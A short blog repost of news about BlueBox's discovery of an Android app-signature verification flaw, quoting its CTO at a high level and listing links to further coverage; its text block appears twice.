Security research team BlueBox has discovered a bug in Google’s Android
operating system which could make 99 percent of all devices vulnerable
to a frightening attack. A vulnerability in the OS could theoretically
allow attackers to take control of an otherwise legitimate app. From
here the attacker could steal information or control the device itself.
According to BlueBox CTO Jeff Forristal, this vulnerability has been present in Android for the last four years and could affect as many as 900 million devices around the world. BlueBox alerted Google about this vulnerability in February and will explain how the bug affects Android later this month at the Black Hat USA Security Conference in Las Vegas, Nevada.
“The vulnerability involves discrepancies in how Android applications are cryptographically verified & installed, allowing for APK code modification without breaking the cryptographic signature,” writes Forristal on the BlueBox corporate blog.
“All Android applications contain cryptographic signatures, which Android uses to determine if the app is legitimate and to verify that the app hasn’t been tampered with or modified. This vulnerability makes it possible to change an application’s code without affecting the cryptographic signature of the application – essentially allowing a malicious author to trick Android into believing the app is unchanged even if it has been.”
Bluebox's corporate blog and how to scan for the vulnerability
Read also comments from others:
blackhat 2013 conference
David Meyer's blog
bug explained and patch from Google
ZDNet 's truth about latest Google security scare
Symantec on this bug and situation in China
According to BlueBox CTO Jeff Forristal, this vulnerability has been present in Android for the last four years and could affect as many as 900 million devices around the world. BlueBox alerted Google about this vulnerability in February and will explain how the bug affects Android later this month at the Black Hat USA Security Conference in Las Vegas, Nevada.
“The vulnerability involves discrepancies in how Android applications are cryptographically verified & installed, allowing for APK code modification without breaking the cryptographic signature,” writes Forristal on the BlueBox corporate blog.
“All Android applications contain cryptographic signatures, which Android uses to determine if the app is legitimate and to verify that the app hasn’t been tampered with or modified. This vulnerability makes it possible to change an application’s code without affecting the cryptographic signature of the application – essentially allowing a malicious author to trick Android into believing the app is unchanged even if it has been.”
Bluebox's corporate blog and how to scan for the vulnerability
Read also comments from others:
blackhat 2013 conference
David Meyer's blog
bug explained and patch from Google
ZDNet 's truth about latest Google security scare
Symantec on this bug and situation in China
留言
張貼留言